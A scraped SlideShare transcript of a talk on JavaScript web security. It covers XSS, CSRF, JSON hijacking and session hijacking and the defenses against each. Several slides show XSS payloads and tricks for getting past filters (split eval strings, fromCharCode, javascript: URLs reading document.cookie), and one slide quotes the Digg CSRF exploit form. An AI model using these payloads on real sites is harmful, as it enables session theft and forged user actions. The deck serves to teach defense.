JavaScript Security
Upcoming SlideShare
Loading in...5
×

Like this? Share it with your network

Share

JavaScript Security

  • 18,719 views
Uploaded on

JavaScript, as it is today, is an insecure language. We need to understand it's shortcomings to improve the security of our applications to protect our users.

JavaScript, as it is today, is an insecure language. We need to understand it's shortcomings to improve the security of our applications to protect our users.

More in: Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
18,719
On Slideshare
18,228
From Embeds
491
Number of Embeds
11

Actions

Shares
Downloads
456
Comments
0
Likes
15

Embeds 491

http://www.nearinfinity.com 388
http://www.slideshare.net 40
http://localhost 25
http://www.nofluffjuststuff.com 14
https://www.altamiracorp.com 7
http://nearinfinity.com 6
http://translate.googleusercontent.com 4
http://static.slideshare.net 3
http://server1.webkicks.de 2
http://www.feedhaus.com 1
http://www.therichwebexperience.com 1

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. JavaScript Security jason harwig
  • 2. quot;How dangerous could this silly little toy scripting language running inside a browser be?quot; Jeff Atwood codinghorror.com stackoverflow.com
  • 3. “JavaScript's biggest weakness is that it is not secure.” douglas crockford
  • 4. quot;.. nine out of 10 websites still have serious vulnerabilities. . (XSS) as the top vulnerability classquot; WhiteHat Security Website Security Statistic Report
  • 5. OWASP Top 10 2007 1. XSS 6. Information Leakage 2. Injection Flaws 7. Broken Auth 3. File Exec 8. Insecure Crypto 4. Direct Object 9. Insecure Reference Communications 5. CSRF 10.Failure to restrict URL access
  • 6. browser limitations
  • 7. javascript IO • Ajax • Image • iFrame • Source script • Bridge to flash, Java applets
  • 8. var xhr = new XmlHttpRequest(); xhr.open(...)
  • 9. NIC Server Google * get or post
  • 10. var image = new Image(); image.src = url; * can detect connection success failure
  • 11. NIC Server Google * get requests only | onload | onerror
  • 12. f = document.createElement('iframe'); f.src = url; document.body.appendChild(f); * only if same domain
  • 13. NIC Server Google * get requests only
  • 14. s = document.createElement('script'); s.type = 'text/javascript'; s.src= url; document.body.appendChild(s); * if JSON returned
  • 15. NIC Server Google * get requests only
  • 16. f = document.createElement('form'); f.method = 'post'; ... f.submit();
  • 17. NIC Server Google * get or post
  • 18. white hat • Mashup / Aggregate content • SSO Solutions • Protect users / application integrity
  • 19. black hat • XSS • CSRF • JSON hi-jacking • Cookie session hijacking • Internal network scanning • History checking
  • 20. cross-site scripting
  • 21. Browser IFrame same origin policy
  • 22. user input escape it!
  • 23. XSS Flavors • Type 0 - DOM • Type 1 - Non-Persistant • Type 2 - Persistant
  • 24. type 0 var p = location.href.params; document.body.innerHTML = p
  • 25. Type 1 Search: <script>alert('xss');</script>
  • 26. Type 2 Please enter username: <script>alert('xss');</script>
  • 27. <c:out value=quot;${var}quot; Your Username: <script>alert('xss');</script> escapeXml=quot;truequot;/>
  • 28. html filtering
  • 29. samy is my hero from http://fast.info/myspace/
  • 30. Friend Requests 7,000 5,250 3,500 1,750 0 12:34pm 1:30am 8:35am 9:30am 10:30am 1:30pm
  • 31. tag/attribute whitelist <div style=quot;background:url( 'javascript:alert('xss')' )quot;>
  • 32. 'javascript' stripped <div style=quot;background:url( 'javanscript:alert('xss')' )quot;>
  • 33. quot; stripped String.fromCharCode(34);
  • 34. innerHTML stripped eval('document.body.inne' + 'rHTML');
  • 35. onreadystatechange stripped eval('xmlhttp.onread' + 'ystatechange = callback');
  • 36. to be continued..
  • 37. alternatives to escaping?
  • 38. google caja / ADsafe
  • 39. attack vectors to prevent?
  • 40. code evaluation eval('alert(document.cookie)'); (new Function('alert(document.cookie)'))();
  • 41. code eval continued <iframe src=quot;java&#65533;script:alert('xss')quot;> </iframe>
  • 42. poluting global objects try { throw EvilArrayFunction; } catch (Array) { }
  • 43. xss lessons • Escape XML
  • 44. cross site request forgery the new kid
  • 45. NIC Server Google
  • 46. Digg.com • “digg” a story while logged in • Cookie authentication • known url, parameters
  • 47. digg exploit code mf = window.frames[quot;myframequot;]; html = '<form name=quot;diggformquot; action=quot;http://digg.com/diginfullquot; method=quot;postquot;>'; html = html+'<input type=quot;textquot; name=quot;idquot; value=quot;367034quot;/>'; html = html+'<input type=quot;textquot; name=quot;orderchangequot; value=quot;2quot;/>'; html = html+'<input type=quot;textquot; name=quot;categoryquot; value=quot;0quot;/>'; html = html+'<input type=quot;textquot; name=quot;pagequot; value=quot;0quot;/>'; html = html+'<input type=quot;textquot; name=quot;tquot; value=quot;undefinedquot;/>'; html = html+'<input type=quot;textquot; name=quot;rowquot; value=quot;1quot;/>'; html = html+'</form>'; mf.document.body.innerHTML = html; mf.document.diggform.submit(); from http://4diggers.blogspot.com/
  • 48. Fixes? • Referral checking? • quick cookie expiration? • post?
  • 49. solved session.setAttribute(quot;tokenquot;, token); <input type=quot;hiddenquot; value=quot;${token}quot;/>
  • 50. double submit cookie
  • 51. digg link <a href=quot;javascript:dig([num],[id],[digCheck])quot;>digg it</a>
  • 52. digg submit js new Ajax.Request(quot;/diginfullquot;, { quot;methodquot;: quot;postquot;, quot;parametersquot;: quot;id=quot; + itemd + quot;&row=quot; + row + quot;&digcheck=quot; + digcheck + quot;&type=quot; + type + quot;&loc=quot; + pagetype });
  • 53. no diggcheck, no digg
  • 54. digg.com • Added random hash as post parameter • server verifies request
  • 55. myspace • used hash in post to add friends • XSS vulnerable so the hash could be retrieved
  • 56. HDIV • HTTP Data Integrity Validator
  • 57. rsnake joins twitter
  • 58. crossdomain.xml <?xml version=quot;1.0quot; encoding=quot;UTF-8quot;?> <cross-domain-policy xmlns:xsi=quot;http://www.w3.org/2001/ XMLSchema-instancequot; xsi:noNamespaceSchemaLocation=quot;http:// www.adobe.com/xml/schemas/PolicyFile.xsdquot;> <allow-access-from domain=quot;*.twitter.comquot; /> <site-control permitted-cross-domain-policies=quot;master-onlyquot;/> <allow-http-request-headers-from domain=quot;*.twitter.comquot; headers=quot;*quot; secure=quot;truequot;/> </cross-domain-policy>
  • 59. http://www.yourminis.com/search_minis.aspx?q=XSS
  • 60. stealing your gmail contacts
  • 61. google contacts url contacts?out=js&callback=google
  • 62. responseText google ({ Success: true, Errors: [], Body: { Contacts: [ { id, email, etc. } ] } });
  • 63. google’s solution? • responseXml
  • 64. lessons • Protect high value forms • CANNOT be stopped if site is vulnerable to XSS
  • 65. json hijacking
  • 66. new Ajax.Request('secretStuff', { onSuccess: doWork }); // server responds with [ { sensitive_info: '...' }, { sensitive_info: '...' } ]
  • 67. So how do I do it? • Override Array • Source script
  • 68. demo
  • 69. solved /*-secure- [ { sensitive_info: '...' }, { sensitive_info: '...' } ] */
  • 70. “solved” continued • protect JSON services behind post
  • 71. lessons • Many experts recommend JSON services shouldn’t serve sensitive data • use secure comment • responseXml as alternative
  • 72. Session hijacking
  • 73. demo
  • 74. internal network penetration
  • 75. history hijack
  • 76. demo
  • 77. resources quot;Security Now! Podcastquot; quot;Fortifyquot; twit.tv/sn fortifysoftware.com/security- resources/ quot;WhiteHat Securityquot; whitehatsec.com quot;XSS Generatorquot; ha.ckers.org/xss.html quot;Jeremiah Grossman Blogquot; jeremiahgrossman.blogspot.com quot;Samy is my Heroquot; fast.info/myspace quot;Digg Hackquot; 4diggers.blogspot.com quot;HDIVquot; hdiv.org
  • 78. twitter: jharwig jason.harwig@nearinfinity.com nearinfinity.com/blogs careers@nearinfinity.com 81